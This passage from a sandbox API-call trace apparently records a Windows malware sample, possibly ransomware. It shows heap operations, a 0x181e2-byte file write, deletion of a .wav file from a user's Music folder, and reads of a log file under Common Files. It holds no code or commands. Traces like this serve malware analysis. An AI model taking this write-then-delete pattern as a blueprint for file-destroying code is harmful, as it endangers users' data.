(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0182.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.404] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0182.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd408, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0182.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.404] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.405] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x181e2, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x181e2, lpOverlapped=0x0) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.406] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.419] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0182.419] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.420] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.421] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.421] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.421] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFilePart=0x0) returned 0x69 [0182.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0x11faa600, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0x90af58 [0182.423] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\ftar8k3covo_ce7d.wav")) returned 1 [0182.431] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0x11faa600, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0 [0182.431] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0182.431] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.432] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.432] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.432] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.432] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.432] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0182.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.433] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.433] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.433] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.436] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.436] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0182.436] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.436] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.437] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0182.437] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1faf, lpOverlapped=0x0) returned 1 [0182.437] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0182.437] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1faf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.437] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.437] HeapFree (in: hHeap=0x8a0000, 